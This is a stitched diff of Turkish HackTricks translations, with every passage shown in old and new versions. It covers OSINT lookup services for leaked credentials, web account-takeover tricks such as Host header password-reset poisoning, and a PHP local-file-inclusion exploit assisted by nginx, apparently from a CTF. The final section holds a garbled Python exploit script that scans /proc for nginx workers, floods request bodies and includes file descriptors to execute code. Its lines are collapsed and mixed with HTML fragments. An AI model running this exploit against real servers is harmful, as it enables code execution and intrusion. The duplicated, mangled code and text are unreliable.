Bu platform, alan adları ve IP adresleri hakkında bilgi verir, örneğin bir IP içindeki alan adları veya bir alan adı sunucusu içindeki alan adları, bir e-postaya ait olan alan adları \(ilgili alan adlarını bulun\), alan adlarının IP geçmişi \(CloudFlare'nin arkasındaki ana bilgisayarı bulun\), bir isim sunucusu kullanan tüm alan adları....
Bazı ücretsiz erişimleriniz var.
Bu platform, alanlar ve IP adresleri hakkında bilgi verir; IP'nin arkasındaki hostu bulun \(CloudFlare'nin arkasındaki hostu bulun\), bir e-postaya ait alanları bulun, alanların IP geçmişini bulun, bir nameserver kullanan tüm alanları bulun....
Bazı ücretsiz erişim hakkınız vardır.
# [fullcontact](https://www.fullcontact.com/)
E-posta, alan adı veya şirket adıyla arama yapmanıza ve ilişkili "kişisel" bilgileri almanıza olanak tanır. Ayrıca e-postaları doğrulayabilir. Bazı ücretsiz erişimler mevcut.
E-posta, alan veya şirket adına göre arama yapmanıza ve ilişkili "kişisel" bilgileri almanıza olanak tanır. Ayrıca e-postaları doğrulayabilir. Bazı ücretsiz erişim hakkı vardır.
# [RiskIQ](https://www.spiderfoot.net/documentation/)
Ücretsiz/topluluk sürümünde bile alan adları ve IP'lerle ilgili birçok bilgi.
Ücretsiz/topluluk sürümünde bile alanlar ve IP'ler hakkında çok fazla bilgi.
# [\_IntelligenceX](https://intelx.io/)
Alan adlarını, IP'leri ve e-postaları arayın ve sızıntılardan bilgi alın. Bazı ücretsiz erişimler mevcut.
Alanları, IP'leri ve e-postaları arayın ve dökümlerden bilgi alın. Bazı ücretsiz erişim hakkınız vardır.
# [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
IP'ye göre arama yapın ve şüpheli faaliyetlerle ilgili bilgileri toplayın. Bazı ücretsiz erişimler mevcut.
IP'ye göre arama yapın ve şüpheli faaliyetlerle ilgili bilgileri toplayın. Bazı ücretsiz erişim hakkınız vardır.
# [Greynoise](https://viz.greynoise.io/)
IP veya IP aralığıyla arama yapın ve İnternet'i tarama yapan IP'ler hakkında bilgi edinin. 15 gün ücretsiz erişim.
IP veya IP aralığına göre arama yapın ve İnterneti tarama yapan IP'ler hakkında bilgi edinin. 15 gün ücretsiz erişim.
# [Shodan](https://www.shodan.io/)
Bir IP adresinin tarama bilgilerini alın. Bazı ücretsiz API erişimi mevcut.
Bir IP adresinin tarama bilgilerini alın. Bazı ücretsiz API erişimi vardır.
# [Censys](https://censys.io/)
@ -98,24 +99,24 @@ Shodan'a çok benzer
# [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/)
Anahtar kelimeyle arama yaparak açık S3 kovalarını bulun.
Anahtar kelimeye göre arama yaparak açık S3 kovalarını bulun.
# [Dehashed](https://www.dehashed.com/data)
E-postaların ve hatta alan adlarının sızdırılan kimlik bilgilerini bulun
Ticari mi?
E-postaların ve hatta alanların sızdırılan kimlik bilgilerini bulun
Ticari?
# [psbdmp](https://psbdmp.ws/)
Bir e-postanın geçmişte hangi yapıştırmalarda göründüğünü arayın. Ticari mi?
Bir e-postanın göründüğü pastebinleri arayın. Ticari?
# [emailrep.io](https://emailrep.io/key)
Bir e-postanın itibarını alın. Ticari mi?
Bir e-postanın itibarını alın. Ticari?
# [ghostproject](https://ghostproject.fr/)
Sızdırılan e-postalardan şifreleri alın. Ticari mi?
Sızdırılan e-postalardan şifreleri alın. Ticari?
# [Binaryedge](https://www.binaryedge.io/)
@ -123,24 +124,10 @@ IP'lerden ilginç bilgiler edinin
# [haveibeenpwned](https://haveibeenpwned.com/)
Alan adı ve e-posta ile arama yapın ve sızdırıldıysa ve şifreleri alın. Ticari mi?
Alan ve e-posta ile arama yapın ve sızdırıldıysa ve şifrelerin alınıp alınmadığını öğrenin. Ticari?
[https://dnsdumpster.com/](https://dnsdumpster.com/)\(ticari bir araçta mı?\)
[https://www.netcraft.com/](https://www.netcraft.com/) \(ticari bir araçta mı?\)
[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/) \(ticari bir araçta mı?\)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz**, [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks

View file

@ -1,61 +1,63 @@
# Diğer Web Hileleri
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya **bizi** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** Twitter'da takip edin.**
* **Hacking hilelerini paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
### Host başlığı
Birçok kez, arka uç, bazı işlemleri gerçekleştirmek için **Host başlığına güvenir**. Örneğin, şifre sıfırlama e-postası göndermek için değerini **alan olarak kullanabilir**. Bu nedenle, şifrenizi sıfırlamak için bir bağlantı içeren bir e-posta aldığınızda, kullanılan alan Host başlığına koyduğunuz alandır. Ardından, diğer kullanıcıların şifre sıfırlama kodlarını çalmak için kullanıcıların şifre sıfırlama isteğini isteyebilir ve alanı kendi kontrolünüzde olan bir alanla değiştirebilirsiniz. [Yazı](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
{% hint style="warning" %}
Kullanıcının sıfırlama bağlantısına tıklamasını beklemenize bile gerek olmadığını unutmayın, çünkü muhtemelen **spam filtreleri veya diğer aracı cihazlar/botlar** bunu analiz etmek için tıklayabilir.
{% endhint %}
### Oturum booleanları
### Ana bilgisayar başlığı
Bazen bazı doğrulamaları doğru bir şekilde tamamladığınızda, arka uç, oturumunuzdaki bir güvenlik özelliğine "True" değeriyle bir boolean ekler. Ardından, farklı bir uç nokta, bu kontrolü başarıyla geçip geçmediğinizi bilecektir.\
Ancak, kontrolü **geçerseniz** ve oturumunuzun güvenlik özelliğinde "True" değeri verilirse, **erişim izniniz olmamasına rağmen** aynı özelliğe bağlı **diğer kaynaklara erişmeyi deneyebilirsiniz**. [Yazı](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
Arka uç bazen bazı işlemleri gerçekleştirmek için **Ana Bilgisayar başlığına** güvenir. Örneğin, şifre sıfırlama bağlantısı göndermek için değerini kullanabilir. Bu nedenle, şifrenizi sıfırlamak için bir bağlantı içeren bir e-posta aldığınızda, kullanılan alan, Ana Bilgisayar başlığına koyduğunuz alandır. Sonra, diğer kullanıcıların şifre sıfırlama isteğini isteyebilir ve alanı kendi kontrolünüzde olan bir alana değiştirerek şifre sıfırlama kodlarını çalmaya çalışabilirsiniz. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
### Kayıt işlevi
{% hint style="warning" %}
Kullanıcıların sıfırlama bağlantısına tıklamasını beklemenize gerek olmadığını unutmayın, çünkü belki de **spam filtreleri veya diğer aracı cihazlar/botlar analiz etmek için tıklar**.
{% endhint %}
Var olan bir kullanıcı olarak kaydolmayı deneyin. Ayrıca noktalar, çok fazla boşluk ve Unicode gibi eşdeğer karakterleri kullanmayı da deneyin.
### Oturum boole'ları
Bazen doğrulamayı doğru bir şekilde tamamladığınızda, arka uç **oturumunuzdaki bir güvenlik özniteliğine "True" değerini ekleyebilir**. Sonra, farklı bir uç nokta, o kontrolü başarıyla geçip geçmediğinizi bilecektir.\
Ancak, eğer **kontrolü geçerseniz** ve oturumunuz güvenlik özniteliğinde "True" değerini alırsa, **aynı özniteliğe bağlı** ancak **erişim izniniz olmaması gereken** diğer kaynaklara **erişmeye çalışabilirsiniz**. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
### Kayıt işlevselliği
Zaten var olan bir kullanıcı olarak kayıt olmayı deneyin. Noktalar, çok fazla boşluk ve Unicode gibi eşdeğer karakterleri de kullanmayı deneyin.
### E-postaları ele geçirme
Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, ardından yeni onay e-postası ilk kaydedilen e-postaya gönderilirse, herhangi bir e-postayı ele geçirebilirsiniz. Veya ikinci e-postayı ilkini onaylayarak etkinleştirebilirseniz, herhangi bir hesabı ele geçirebilirsiniz.
Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, sonra, yeni onay e-postası ilk kayıtlı e-postaya gönderilirse, herhangi bir e-postayı ele geçirebilirsiniz. Ya da ikinci e-postayı etkinleştirebilirseniz, ilkini onaylayarak herhangi bir hesabı ele geçirebilirsiniz.
### Şirketlerin dahili servis masasına erişim (atlassian kullanarak)
### Şirketlerin Atlassian'ı kullanan iç destek masasına erişim
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
### TRACE yöntemi
Geliştiriciler, üretim ortamında çeşitli hata ayıklama seçeneklerini devre dışı bırakmayı unutabilirler. Örneğin, HTTP `TRACE` yöntemi teşhis amaçlı tasarlanmıştır. Etkinleştirildiğinde, web sunucusu, `TRACE` yöntemini kullanan isteklere yanıt olarak aldığı tam isteği yanıtta yankılar. Bu davranış genellikle zararsızdır, ancak bazen, ters proxy'ler tarafından isteklere eklenen dahili kimlik doğrulama başlıklarının adı gibi bilgilerin ifşa edilmesine yol açar.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
Geliştiriciler, üretim ortamında çeşitli hata ayıklama seçeneklerini devre dışı bırakmayı unutabilirler. Örneğin, HTTP `TRACE` yöntemi tanıgnostik amaçlar için tasarlanmıştır. Etkinleştirildiğinde, web sunucusu, `TRACE` yöntemini kullanan isteklere yanıt vererek aldığı tam isteği yanıt olarak yansıtacaktır. Bu davranış genellikle zararsızdır, ancak bazen, ters proxy'ler tarafından isteklere eklenen dahili kimlik doğrulama başlıklarının adı gibi bilgilerin ifşasına yol açabilir.![Gönderi için resim](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
![Gönderi için resim](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya **bizi** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** Twitter'da takip edin.**
* **Hacking hilelerini paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
{% endhint %}

View file

@ -1,36 +1,21 @@
{% hint style="success" %}
**AWS Hacking'i öğrenin ve uygulayın:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP Hacking'i öğrenin ve uygulayın:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'i **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
</details>
{% endhint %}
**DNS saldırıları hakkında daha fazla araştırma yapın**
**DNS'e yönelik saldırılar hakkında daha fazla araştırma yapın**
**DNSSEC ve DNSSEC3**
**IPv6'da DNS**
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'i **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
</details>

View file

@ -7,10 +7,10 @@
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
@ -18,11 +18,11 @@ HackTricks'ı desteklemenin diğer yolları:
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için ücretsiz işlevsellikler sunan **dark-web** destekli bir arama motorudur.
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
@ -30,41 +30,32 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
## Zayıf yapılandırma
[**https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ adresinden örnek**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
[**Örnek https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
* PHP kodu:
\`\`\`\`h\`
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` Not: Bu örnekte PHP'nin \`include\` işlevi, dosya yolunu \`/var/lib/nginx/body/0000001368 (deleted)\` olarak çözümleyeceğinden dolayı, bu örnekte doğrudan \`/proc/34/fd/15\` dahil edilemez. Bu küçük kısıtlama, şans eseri \`/proc/self/fd/34/../../../34/fd/15\` gibi bazı dolaylı yollarla atlatılabilir ve sonunda silinmiş \`/var/lib/nginx/body/0000001368\` dosyasının içeriğini yürütür. ## Tam Sömürü \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # nginx'in müşteri gövde tamponlama yardımıyla PHP yerel dosya dahil etme (LFI) açığı # ayrıntılar için https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ adresine bakın URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # nginx işçi süreçlerini bul r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # nginx'in /var/lib/nginx/body/$X oluşturması için büyük bir müşteri gövdesi yükleyin def uploader(): print('\[+] yükleyici başlıyor') while not done: requests.get(URL, data=' //'
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` Not: Bu örnekte PHP'nin \`include\` işlevi, dosya yolunu \`/var/lib/nginx/body/0000001368 (silindi)\` olarak çözümleyemeyeceğinden dolayı doğrudan \`/proc/34/fd/15\` dahil edilemez. Bu küçük kısıtlama, şans eseri \`/proc/self/fd/34/../../../34/fd/15\` gibi bazı dolaylı yollarla atlatılabilir ve sonunda silinmiş \`/var/lib/nginx/body/0000001368\` dosyasının içeriğini yürütür. ## Tam Sömürü \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # nginx'in müşteri gövde tamponlama yardımıyla PHP yerel dosya dahil etme (LFI) açığı # ayrıntılar için https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ adresine bakın URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # nginx işçi süreçlerini bul r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # nginx'in /var/lib/nginx/body/$X oluşturması için büyük bir müşteri gövdesi yükleyin def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'```
```
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
except:
pass
```
```html
<p>send_payload_worker(requests_session) fonksiyonunu sürekli çağırır.</p>
```markdown
def send_payload_worker(requests_session): while True: send_payload(requests_session)
<p>send_payload_multiprocess(requests_session) fonksiyonu, Nginx için istek gövdesi olarak payload göndermek için tüm CPU'ları kullanır. multiprocessing.cpu_count() sayısı kadar işlem başlatır.</p>
def send_payload_multiprocess(requests_session): # Tüm CPU'ları kullanarak payload'ı Nginx için istek gövdesi olarak göndermek için \_ in range(multiprocessing.cpu_count()): p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,)) p.start()
<p>generate_random_path_prefix(nginx_pids) fonksiyonu, rastgele sayıda ProcFS yol bileşeninden oluşan bir yol oluşturur. Oluşturulan yol /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root gibi görünecektir.</p>
def generate_random_path_prefix(nginx_pids): # Bu yöntem rastgele miktarda ProcFS yol bileşeninden bir yol oluşturur. Oluşturulan yol şu şekilde görünecektir: /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root path = "" component_num = random.randint(0, 10) for \_ in range(component_num): pid = random.choice(nginx_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path
<p>read_file(requests_session, nginx_pid, fd, nginx_pids) fonksiyonu, belirli bir Nginx PID'si ve dosya tanıtıcısı (fd) için istek gövdesi olarak payload gönderir ve yanıtı kontrol eder.</p>
def read_file(requests_session, nginx_pid, fd, nginx_pids): nginx_pid_list = list(nginx_pids) while True: path = generate_random_path_prefix(nginx_pid_list) path += f"/proc/{nginx_pid}/fd/{fd}" try: d = requests_session.get(SERVER + f"/?action=include&file={path}").text except: continue # Bayraklar hxp{} biçiminde biçimlendirilmiştir. if "hxp" in d: print("Bayrak bulundu! ") print(d)
<p>read_file_worker(requests_session, nginx_pid, nginx_pids) fonksiyonu, belirli bir Nginx PID'si için belirli dosya tanıtıcıları arasında dolaşarak payload gönderir ve yanıtı kontrol eder.</p>
def read_file_worker(requests_session, nginx_pid, nginx_pids): # Bir döngüde 10 - 45 arasında Nginx FD'leri tarama. Dosyalar ve soketler sürekli kapanırken - istek gövdesi FD'sinin bu aralıkta açılması çok yaygındır for fd in range(10, 45): thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids)) thread.start()
<p>read_file_multiprocess(requests_session, nginx_pids) fonksiyonu, her bir Nginx PID'si için ayrı bir işlem oluşturarak dosya okuma işlemlerini çoklu işlemle gerçekleştirir.</p>
def read_file_multiprocess(requests_session, nginx_pids): for nginx_pid in nginx_pids: p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids)) p.start()
<p>if __name__ == "__main__":</p>
<p>print('\[DEBUG] Creating requests session')</p>
<p>requests_session = create_requests_session()</p>
<p>print('\[DEBUG] Getting Nginx pids')</p>
<p>nginx_pids = get_nginx_pids(requests_session)</p>
<p>print(f'\[DEBUG] Nginx pids: {nginx_pids}')</p>
<p>print('\[DEBUG] Starting payload sending')</p>
<p>send_payload_multiprocess(requests_session)</p>
<p>print('\[DEBUG] Starting fd readers')</p>
<p>read_file_multiprocess(requests_session, nginx_pids)</p>
if **name** == "**main**": print('\[DEBUG] İstekler oturumu oluşturuluyor') requests_session = create_requests_session() print('\[DEBUG] Nginx pid'leri alınıyor') nginx_pids = get_nginx_pids(requests_session) print(f'\[DEBUG] Nginx pid\'leri: {nginx_pids}') print('\[DEBUG] Payload göndermeye başlanıyor') send_payload_multiprocess(requests_session) print('\[DEBUG] fd okuyucuları başlatılıyor') read_file_multiprocess(requests_session, nginx_pids)
```
```
